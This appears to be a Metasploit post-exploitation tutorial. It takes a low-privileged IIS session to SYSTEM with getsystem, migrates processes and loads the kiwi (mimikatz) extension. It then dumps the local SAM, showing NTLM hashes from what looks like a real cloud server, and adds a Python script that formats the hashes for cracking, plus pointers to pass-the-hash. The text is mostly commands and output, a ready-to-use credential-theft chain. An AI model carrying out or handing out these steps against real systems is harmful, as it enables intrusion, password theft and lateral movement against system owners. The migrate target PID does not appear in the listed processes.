1. Introduction:
The kiwi module:
The old mimikatz extension has been merged into the kiwi extension. kiwi pulls credential material out of LSASS memory and the registry (SAM, LSA secrets), so it needs SYSTEM for commands such as lsa_dump_sam (the creds_* commands can also work from a high-integrity administrator session holding SeDebugPrivilege, but SYSTEM is the reliable choice). Before using the module we therefore raise the current MSF shell to SYSTEM.
2. Privilege escalation:
Raising the session to SYSTEM:
2.1 Two starting points for reaching SYSTEM:
One, the session already runs as an administrator;
Two, use some other technique to escalate to an administrator first. From an administrator session, getsystem can then be run directly in the meterpreter shell to reach SYSTEM.
Caveat: administrator is not the only way in. The named-pipe impersonation techniques that getsystem uses only require SeImpersonatePrivilege, which service identities such as IIS application pool accounts, NETWORK SERVICE and LOCAL SERVICE hold by default. That is exactly why the low-privileged IIS APPPOOL\web session below goes straight to SYSTEM. Check what the session holds with getprivs (or whoami /priv from a shell) before trying.
2.2 Escalating:
getuid #show which user the current session runs as
getsystem #try the built-in escalation techniques automatically (-t N selects a single technique)
The session starts out as an ordinary low-privileged user:
meterpreter > getuid
Server username: IIS APPPOOL\web
getsystem escalates successfully:
meterpreter > getsystem -t 6
...got system via technique 6 (Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)).
Then list the processes with ps to pick a SYSTEM-owned x64 process to migrate into:
meterpreter > ps
Process List
============
PID   PPID  Name              Arch  Session  User                           Path
---   ----  ----              ----  -------  ----                           ----
0     0     [System Process]
4     0     System            x64   0
300   4     smss.exe          x64   0
316   616   sqlservr.exe      x64   0        NT SERVICE\MSSQLSERVER         C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
328   616   vsvnhttpsvc.exe   x64   0        NT AUTHORITY\NETWORK SERVICE   C:\Program Files\VisualSVN Server\bin\vsvnhttpsvc.exe
360   932   WUDFHost.exe      x64   0        NT AUTHORITY\LOCAL SERVICE     C:\Windows\System32\WUDFHost.exe
396   388   csrss.exe         x64   0
416   720   WmiPrvSE.exe      x64   0        NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\wbem\WmiPrvSE.exe
476   388   wininit.exe       x64   0
484   468   csrss.exe         x64   1
572   468   winlogon.exe      x64   1        NT AUTHORITY\SYSTEM            C:\Windows\System32\winlogon.exe
580   1104  taskhostw.exe     x64   2        172_19_0_5\admin               C:\Windows\System32\taskhostw.exe
616   476   services.exe      x64   0
632   476   lsass.exe         x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\lsass.exe
648   616   svchost.exe       x64   2        172_19_0_5\admin               C:\Windows\System32\svchost.exe
720   616   svchost.exe       x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
784   616   svchost.exe       x64   0        NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\svchost.exe
880   572   LogonUI.exe       x64   1        NT AUTHORITY\SYSTEM            C:\Windows\System32\LogonUI.exe
888   572   dwm.exe           x64   1        Window Manager\DWM-1           C:\Windows\System32\dwm.exe
924   616   svchost.exe       x64   0        NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\svchost.exe
932   616   svchost.exe       x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
1020  616   svchost.exe       x64   0        NT AUTHORITY\LOCAL SERVICE     C:\Windows\System32\svchost.exe
1064  616   svchost.exe       x64   0        NT AUTHORITY\LOCAL SERVICE     C:\Windows\System32\svchost.exe
1096  616   svchost.exe       x64   0        NT AUTHORITY\LOCAL SERVICE     C:\Windows\System32\svchost.exe
1104  616   svchost.exe       x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
1244  616   svchost.exe       x64   0        NT AUTHORITY\LOCAL SERVICE     C:\Windows\System32\svchost.exe
1264  616   svchost.exe       x64   0        NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\svchost.exe
1276  720   ChsIME.exe        x64   2        172_19_0_5\admin               C:\Windows\System32\InputMethod\CHS\ChsIME.exe
1752  616   svchost.exe       x64   0        NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\svchost.exe
1820  616   svchost.exe       x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
1864  616   svchost.exe       x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
1892  616   BaradAgent.exe    x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\QCloud\Monitor\Barad\BaradAgent.exe
1968  616   svchost.exe       x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
1992  616   sqlwriter.exe     x64   0        NT AUTHORITY\SYSTEM            C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
2000  616   sgagent.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\QCloud\Stargate\sgagent.exe
2008  616   svchost.exe       x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
2020  616   tat_agent.exe     x64   0        NT AUTHORITY\SYSTEM            C:\Program Files\QCloud\tat_agent\ta
Migrate into a process. Choose one owned by NT AUTHORITY\SYSTEM whose architecture matches the host (x64 here): the session then holds a stable SYSTEM primary token instead of the impersonated one, survives the IIS worker process being recycled, and runs the x64 build of the kiwi extension, which a 32-bit meterpreter cannot use to read the 64-bit LSASS. Do not pick lsass.exe itself; if the injected thread crashes it, the machine reboots.
meterpreter > migrate 3820
[*] Migrating from 5320 to 3820...
[*] Migration completed successfully.
Load the extension. load mimikatz still works, but it only prints a deprecation notice and loads kiwi, so load kiwi is the command to use:
meterpreter > load mimikatz
[!] The "mimikatz" extension has been replaced by "kiwi". Please use this in future.
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
View the extension's help with help kiwi:
meterpreter > help kiwi
Kiwi Commands
=============
Command Description
------- -----------
creds_all Retrieve all credentials (parsed)
creds_kerberos Retrieve Kerberos creds (parsed)
creds_livessp Retrieve Live SSP creds
creds_msv Retrieve LM/NTLM creds (parsed)
creds_ssp Retrieve SSP creds
creds_tspkg Retrieve TsPkg creds (parsed)
creds_wdigest Retrieve WDigest creds (parsed)
dcsync Retrieve user account information via DCSync (unparsed)
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create Create a golden kerberos ticket
kerberos_ticket_list List all kerberos tickets (unparsed)
kerberos_ticket_purge Purge any in-use kerberos tickets
kerberos_ticket_use Use a kerberos ticket
kiwi_cmd Execute an arbitary mimikatz command (unparsed)
lsa_dump_sam Dump LSA SAM (unparsed)
lsa_dump_secrets Dump LSA secrets (unparsed)
password_change Change the password/hash of a user
wifi_list List wifi profiles/creds for the current user
wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)
The password and credential related commands:
creds_all: #list all credentials from every provider
creds_kerberos: #list Kerberos credentials
creds_msv: #list MSV credentials (LM/NTLM hashes of logged-on users)
creds_ssp: #list SSP credentials
creds_tspkg: #list TsPkg credentials
creds_wdigest: #list WDigest credentials (cleartext passwords only when WDigest caching is enabled, which has been off by default since Windows 8.1 / Server 2012 R2)
dcsync: #retrieve a user account's information via DCSync (requires directory replication rights on the domain, e.g. a Domain Admin)
dcsync_ntlm: #retrieve a user account's NTLM hash, SID and RID via DCSync
golden_ticket_create: #create a golden ticket (needs the krbtgt NT hash and the domain SID)
kerberos_ticket_list: #list Kerberos tickets
kerberos_ticket_purge: #purge Kerberos tickets
kerberos_ticket_use: #use (inject) a Kerberos ticket
kiwi_cmd: #run a raw mimikatz command, with the same syntax as mimikatz.exe
lsa_dump_sam: #dump the local SAM through LSA (NT hashes of local accounts)
lsa_dump_secrets: #dump LSA secrets (service account passwords, cached domain credentials and similar)
password_change: #change a user's password or hash
wifi_list: #list the current user's wifi profiles/creds
wifi_list_shared: #list shared wifi profiles/creds (requires SYSTEM)
Dump the local SAM directly:
meterpreter > lsa_dump_sam
[+] Running as SYSTEM
[*] Dumping SAM
Domain : 172_19_0_5
SysKey : 6a1d3295e5ce0aa1eb9871750b8a0942
Local SID : S-1-5-21-3925609119-1055855973-2504285507
SAMKey : a7560bed1540bf80158f27e92e672d72
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 3f10b4bc33875a54c357b013abdbbb6e
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000003f1 (1009)
User : admin
Hash NTLM: 4b37422333f67ebc8778d798ad2af741
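Copying hashes out of the console by hand is error-prone, so as an added example (not part of the original post, and not Metasploit or mimikatz code) the script below parses a kiwi lsa_dump_sam listing into account records, emits pwdump-style lines for the accounts that actually hold an NT hash, and flags blank-password accounts. SAMPLE_DUMP is constructed from the listing shown above; the NT hashes are the page's own demo values. The empty-LM and empty-NT constants are the well-known values, everything else is this script's own naming.

```python
"""Turn a kiwi ``lsa_dump_sam`` listing into pwdump/hashcat input.

Added example, not part of the original post and not Metasploit or mimikatz
code. SAMPLE_DUMP is constructed from the listing shown on this page; the
NT hashes are the page's own demo values.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Modern Windows stores no LM hash; pwdump consumers expect this constant
# in the LM column instead.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty string, i.e. an account with a blank password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed from the page's own lsa_dump_sam output.
SAMPLE_DUMP = """\
[+] Running as SYSTEM
[*] Dumping SAM
Domain : 172_19_0_5
SysKey : 6a1d3295e5ce0aa1eb9871750b8a0942
Local SID : S-1-5-21-3925609119-1055855973-2504285507
SAMKey : a7560bed1540bf80158f27e92e672d72
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 3f10b4bc33875a54c357b013abdbbb6e
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000003f1 (1009)
User : admin
Hash NTLM: 4b37422333f67ebc8778d798ad2af741
"""

RID_RE = re.compile(r"^RID\s*:\s*([0-9a-fA-F]+)\s*\((\d+)\)")
USER_RE = re.compile(r"^User\s*:\s*(.+?)\s*$")
NTLM_RE = re.compile(r"^Hash NTLM\s*:\s*([0-9a-fA-F]{32})")
HEADER_RE = re.compile(r"^([A-Za-z][A-Za-z ]*?)\s*:\s*(.+?)\s*$")


@dataclass
class SamEntry:
    rid: int
    user: str
    nt_hash: Optional[str]  # None when the SAM holds no NT hash for the account


def parse_sam_dump(text: str) -> Tuple[Dict[str, str], List[SamEntry]]:
    """Return (header fields such as Domain/Local SID, account entries)."""
    header: Dict[str, str] = {}
    entries: List[SamEntry] = []
    current: Optional[SamEntry] = None
    for raw in text.splitlines():
        line = raw.strip()
        m = RID_RE.match(line)
        if m:
            # Every "RID :" line opens a new account record; the decimal
            # value in parentheses is the one used in pwdump lines.
            current = SamEntry(rid=int(m.group(2)), user="", nt_hash=None)
            entries.append(current)
            continue
        if current is None:
            # Still in the header block before the first account.
            m = HEADER_RE.match(line)
            if m:
                header[m.group(1)] = m.group(2)
            continue
        m = USER_RE.match(line)
        if m:
            current.user = m.group(1)
            continue
        m = NTLM_RE.match(line)
        if m:
            current.nt_hash = m.group(1).lower()
    return header, entries


def to_pwdump(entries: List[SamEntry]) -> List[str]:
    """user:rid:lm:nt::: lines, only for accounts that actually have an NT hash."""
    return [
        f"{e.user}:{e.rid}:{EMPTY_LM}:{e.nt_hash}:::"
        for e in entries
        if e.nt_hash is not None
    ]


def empty_password_accounts(entries: List[SamEntry]) -> List[str]:
    """Accounts whose NT hash is the hash of the empty string."""
    return [e.user for e in entries if e.nt_hash == EMPTY_NT]


def no_hash_accounts(entries: List[SamEntry]) -> List[str]:
    """Accounts the SAM holds no NT hash for (typically disabled built-ins)."""
    return [e.user for e in entries if e.nt_hash is None]


if __name__ == "__main__":
    hdr, accts = parse_sam_dump(SAMPLE_DUMP)
    print(f"# {hdr['Domain']} {hdr['Local SID']}")
    print("\n".join(to_pwdump(accts)))
    print("# no NT hash stored:", ", ".join(no_hash_accounts(accts)))
```

The pwdump lines can go straight into hashcat (-m 1000 with --username) or John; the NT hash alone is enough for pass-the-hash, for example as the SMBPass value of exploit/windows/smb/psexec in the LMHASH:NTHASH form. Guest and DefaultAccount are skipped rather than written out with a placeholder hash, because "no NT hash stored" is not the same as "blank password", and a blank-password account is reported separately so it is not mistaken for an uncrackable one.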